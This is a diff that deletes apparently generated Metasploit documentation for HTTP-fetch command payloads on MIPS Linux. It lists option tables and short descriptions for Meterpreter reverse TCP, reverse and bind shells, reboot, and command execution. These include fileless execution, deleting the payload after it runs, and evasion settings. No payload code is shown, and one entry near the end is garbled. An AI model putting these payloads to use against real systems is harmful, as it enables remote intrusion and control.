FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,97 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/mipsbe/meterpreter_reverse_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 105
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
Adam Cammack <adam_cammack@rapid7.com>
|
||||
Brent Cook <brent_cook@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME QibeYbciB no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an MIPSBE payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,69 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux Reboot
|
||||
Module: payload/cmd/linux/http/mipsbe/reboot
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 105
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
Michael Messner <devnull@s3cur1ty.de>
|
||||
rigan - <imrigan@gmail.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST yes Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME vwzXdDryf no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an MIPSBE payload from an HTTP server.
|
||||
|
||||
A very small shellcode for rebooting the system.
|
||||
This payload is sometimes helpful for testing purposes or executing
|
||||
other payloads that rely on initial startup procedures.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,91 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager
|
||||
Module: payload/cmd/linux/http/mipsbe/shell/reverse_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 108
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
juan vazquez <juan.vazquez@metasploit.com>
|
||||
tkmru
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME uTHuAvxylJ no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an MIPSBE payload from an HTTP server.
|
||||
Spawn a command shell (staged).
|
||||
|
||||
Connect back to the attacker
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,74 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline
|
||||
Module: payload/cmd/linux/http/mipsbe/shell_bind_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 108
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
scut
|
||||
vaicebine
|
||||
Vlatko Kosturjak
|
||||
juan vazquez <juan.vazquez@metasploit.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST yes Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME EtbkdTGdbo no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an MIPSBE payload from an HTTP server.
|
||||
Listen for a connection and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,79 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline
|
||||
Module: payload/cmd/linux/http/mipsbe/shell_reverse_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 114
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
rigan <imrigan@gmail.com>
|
||||
juan vazquez <juan.vazquez@metasploit.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME LTdmakIVHUuT no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an MIPSBE payload from an HTTP server.
|
||||
Connect back to attacker and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,70 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux Execute Command
|
||||
Module: payload/cmd/linux/http/mipsle/exec
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 111
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
Michael Messner <devnull@s3cur1ty.de>
|
||||
entropy <entropy@phiral.net>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CMD yes The command string to execute
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST yes Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME BHtMUdPnuAr no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an MIPSLE payload from an HTTP server.
|
||||
|
||||
A very small shellcode for executing commands.
|
||||
This module is sometimes helpful for testing purposes as well as
|
||||
on targets with extremely limited buffer space.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,100 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Reverse TCP Stager
|
||||
Module: payload/cmd/linux/http/mipsle/meterpreter/reverse_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 108
|
||||
Rank: Norm
|
||||
Evasion options for payload/cmd/linux/http/mipsle/meterpreter/reverse_tcp:
|
||||
=========================
|
||||
|
||||
juan vazquez <juan.vazquez@metasploit.com>
|
||||
tkmru
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME UlqevxizRg no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an MIPSLE payload from an HTTP server.
|
||||
Connect back to the attacker
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
